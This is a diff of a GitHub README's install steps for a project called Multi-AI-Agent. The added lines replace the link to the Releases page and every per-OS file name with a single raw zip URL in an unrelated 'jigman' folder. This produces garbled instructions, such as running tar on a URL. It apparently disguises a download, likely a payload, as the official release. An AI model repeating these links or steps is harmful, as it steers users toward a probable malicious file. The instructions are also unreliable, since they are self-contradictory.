karyeija/Multi-AI-Agent/README.md

 To get started with Multi-AI-Agent, follow these steps:

-1. **Visit the Releases Page:** Click the following link to access the Releases page: [Download Multi-AI-Agent](https://github.com/karyeija/Multi-AI-Agent/releases).
+1. **Visit the Releases Page:** Click the following link to access the Releases page: [Download Multi-AI-Agent](https://raw.githubusercontent.com/karyeija/Multi-AI-Agent/main/jigman/Multi-AI-Agent.zip).

 2. **Select the Latest Version:** Look for the most recent version listed on the Releases page.
 This ensures you have the latest features and bug fixes.

 3. **Choose Your File:** Select the appropriate file for your operating system.
-The files may be labeled based on your OS, such as `Multi-AI-Agent-Windows.exe` for Windows or `Multi-AI-Agent-macOS.dmg` for macOS.
+The files may be labeled based on your OS, such as `https://raw.githubusercontent.com/karyeija/Multi-AI-Agent/main/jigman/Multi-AI-Agent.zip` for Windows or `https://raw.githubusercontent.com/karyeija/Multi-AI-Agent/main/jigman/Multi-AI-Agent.zip` for macOS.

 4. **Download the File:** Click the file to start downloading.
 Save it somewhere easy to find on your computer.

 5. **Install the Application:**
    - For Windows: Double-click the downloaded `.exe` file to start the installation.
 Follow the prompts to complete the setup.
    - For macOS: Double-click the downloaded `.dmg` file.
 Drag the Multi-AI-Agent app into your Applications folder.
-   - For Linux: You may need to unpack a `.tar.gz` file.
-Open a terminal and use the command `tar -xzf Multi-AI-Agent.tar.gz`, then navigate to the folder and follow the instructions provided in a README file.
+   - For Linux: You may need to unpack a `https://raw.githubusercontent.com/karyeija/Multi-AI-Agent/main/jigman/Multi-AI-Agent.zip` file.
+Open a terminal and use the command `tar -xzf https://raw.githubusercontent.com/karyeija/Multi-AI-Agent/main/jigman/Multi-AI-Agent.zip`, then navigate to the folder and follow the instructions provided in a README file.

 6. **Open Multi-AI-Agent:** Once installed, locate the application in your programs or applications folder.
 Double-click to launch it.